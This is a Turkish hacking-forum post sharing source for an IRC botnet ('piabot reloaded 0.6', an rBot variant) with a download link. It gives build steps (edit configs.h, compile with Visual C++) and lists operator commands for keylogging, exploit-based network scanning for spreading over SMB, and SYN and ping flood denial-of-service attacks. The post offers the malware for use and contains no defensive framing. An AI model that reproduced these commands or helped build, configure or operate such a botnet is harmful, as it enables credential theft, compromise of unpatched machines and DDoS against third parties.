IRC Botnet, [Ddos, Keylogger, Exploit]

THE_MILLER

Katılımcı Üye
8 Ocak 2007
459
21
85
Italy // Roma
Botnetimi (Bir çoğumuz botnetin ne olduğunu biliyordur.) Test için Kurmuştum.Elimde olan source’yi test etmek için, Kullandım’da..Gerçektende; exploit bakımından ve ddos bakımından güzel hoş bir source..Sizler ile paylaşmak istedim.
Size gerekli olan;

Visual basic 6.0
service pack6
SDK
kurulu olan bir makina..
Yapmanız gereken; zipten cıkartmış oldugunuz source klasörünün içerisinde ki, rBot.dsw dosyasını açıp :
rbot files’in, içerisinde bulunan Configuration klasöründe; configs.h dosyasını açtıktan sonra, kendinize göre editlemeniz.
Editledikten sonra; f7 tusuna basarak, exe’mizi olusturmuş oluyoruz..
version : piabot reloaded 0.6
Login olmak için :
.login passwordunuz
Logout için :
.logout
Keylogger’i acmak için :
.keylog on
Keylogger’i kapamak için :
.keylog off
(Scan komudunu kanal topic’inden algılar) Topic icin ve scan icin kullanabileceginiz komut :
.advscan asn1smb 200 5 0 -r -b
Ddos attack için :
.tcpflood syn ipnumarasi <port> <time>
Pingflood için :
.pingflood ipnumarasi 400 5000 100
Bu döküman tarafımdan hazırlanmıştır.Kesinlikle Alıntı değildir ve Başka bir yer(d)e tarafımca, paylaşılmamıştır/paylaşılmayacaktır.

Download İçin Tıkla!!


aLıntı...
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.